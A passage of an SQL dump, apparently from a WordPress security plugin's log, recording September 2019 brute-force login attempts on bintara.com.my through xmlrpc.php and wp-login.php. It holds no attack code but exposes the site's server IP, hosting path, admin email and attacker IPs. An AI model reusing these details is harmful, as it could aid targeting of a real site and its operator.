empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.226.28.41\";s:11:\"REMOTE_PORT\";s:5:\"48196\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHMgq1FqYKvioG46Y44UAAAAJc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568787586.9965\";s:12:\"REQUEST_TIME\";s:10:\"1568787586\";}}','notice','2019-09-18 06:19:48','2019-09-18 06:19:47',18258984,19555480,'https://bintara.com.my/xmlrpc.php',1,0,'41.226.28.41'),(24944,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"57431\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHOISqbKGlf1IVly7Ok9QAAAUs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568788001.5718\";s:12:\"REQUEST_TIME\";s:10:\"1568788001\";}}','notice','2019-09-18 06:26:42','2019-09-18 06:26:41',17744208,19235104,'https://bintara.com.my/wp-login.php',1,0,'97.74.228.176'),(24945,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"57815\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHOJK1FqYKvioG46Y45vQAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568788004.3924\";s:12:\"REQUEST_TIME\";s:10:\"1568788004\";}}','notice','2019-09-18 06:26:45','2019-09-18 06:26:44',18257968,19553504,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.228.176'),(24946,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"51198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHPHCqbKGlf1IVly7OlbwAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568788252.2434\";s:12:\"REQUEST_TIME\";s:10:\"1568788252\";}}','notice','2019-09-18 06:30:53','2019-09-18 06:30:52',17742536,19234536,'https://bintara.com.my/wp-login.php',1,0,'128.199.155.15'),(24947,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"51466\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHPHq1FqYKvioG46Y46ZwAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:12:\"1568788254.5\";s:12:\"REQUEST_TIME\";s:10:\"1568788254\";}}','notice','2019-09-18 06:30:55','2019-09-18 06:30:54',18260296,19557672,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.155.15'),(24948,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.226.28.41\";s:11:\"REMOTE_PORT\";s:5:\"52168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHP0q1FqYKvioG46Y47LgAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568788434.781\";s:12:\"REQUEST_TIME\";s:10:\"1568788434\";}}','notice','2019-09-18 06:33:56','2019-09-18 06:33:55',17739416,19230152,'https://bintara.com.my/wp-login.php',1,0,'41.226.28.41'),(24949,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.226.28.41\";s:11:\"REMOTE_PORT\";s:5:\"53036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHP1q1FqYKvioG46Y47MQAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568788438.2833\";s:12:\"REQUEST_TIME\";s:10:\"1568788438\";}}','notice','2019-09-18 06:33:59','2019-09-18 06:33:58',18257520,19557992,'https://bintara.com.my/xmlrpc.php',1,0,'41.226.28.41'),(24950,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.14.72\";s:11:\"REMOTE_PORT\";s:5:\"55574\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHRZiqbKGlf1IVly7OmQAAAAU0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568788838.2898\";s:12:\"REQUEST_TIME\";s:10:\"1568788838\";}}','notice','2019-09-18 06:40:39','2019-09-18 06:40:38',17739864,19230144,'https://bintara.com.my/wp-login.php',1,0,'37.59.14.72'),(24951,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.14.72\";s:11:\"REMOTE_PORT\";s:5:\"56242\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHRaUQGijxhVPhG1M0YRQAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568788841.1434\";s:12:\"REQUEST_TIME\";s:10:\"1568788841\";}}','notice','2019-09-18 06:40:42','2019-09-18 06:40:41',18257992,19554672,'https://bintara.com.my/xmlrpc.php',1,0,'37.59.14.72'),(24952,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 